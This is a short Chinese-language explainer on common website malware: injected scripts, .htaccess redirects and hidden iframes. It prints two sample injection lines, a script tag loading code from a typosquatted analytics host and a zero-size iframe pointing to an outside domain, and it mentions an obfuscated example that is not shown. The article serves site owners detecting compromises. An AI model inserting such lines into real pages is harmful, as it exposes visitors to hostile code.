常见类型的恶意软件行为

liqing

最常见的三种能攻击网站的恶意软件行为有恶意脚本，目录级重定向和隐藏的内嵌框架。注意: 如果您的网站显示"可能被黑客攻击"的警告，您可以使用谷歌进程来移除。标记为"可能被黑客攻击"的网站和标记为"可能会损害您的计算机"的网站或"网站被攻击"是不一样的。


恶意脚本
恶意脚本经常被用于重定向使网站访客访问一个不同的网站或者加载来自从另一个来源的恶意软件。看到此脚本如何拼错"分析"这个词了吗?有一些恶意脚本的名称使他们看起来像来自一个合法的网站。

<script src='http:// google-anaiytics.com/urchin.js'></script>

这些脚本通常可以通过您网页中的内容或服务器上其他文件进行注入，比如图像或PDF文件。有时，并不是将整个脚本注入到您的web页面，攻击者只需将指针注入到.js或攻击者保存在您web服务器上目录的其他文件中。

很多恶意脚本 (如下面的那个) 使用模糊处理使他们更难被杀毒软件扫描到。



目录级重定向
Apache web 服务器由许多的虚拟主机提供商使用，使用一个称为.htaccess的隐藏服务器文件来配置网站上目录的某些访问设置。攻击者有时会修改您的web服务器上的现有.htaccess 文件或上传新的.htaccess 文件到您web服务器上，其中包含将用户重定向到恶意网站的指令。



隐藏的内嵌框架
Iframe是从另其他网页或网站中加载网页内容的一部分。攻击者会经常将恶意的iframe注入到网页中或服务器上的其他文件上。通常情况下，这些iframe将会被配置，因此当有人访问页面的时候他们不会出现在网页上，但恶意的内容还是会加载尽管被隐藏了。
<iframe src="http://youneedsex.info/in.php" width=0 height=0 frameborder=0>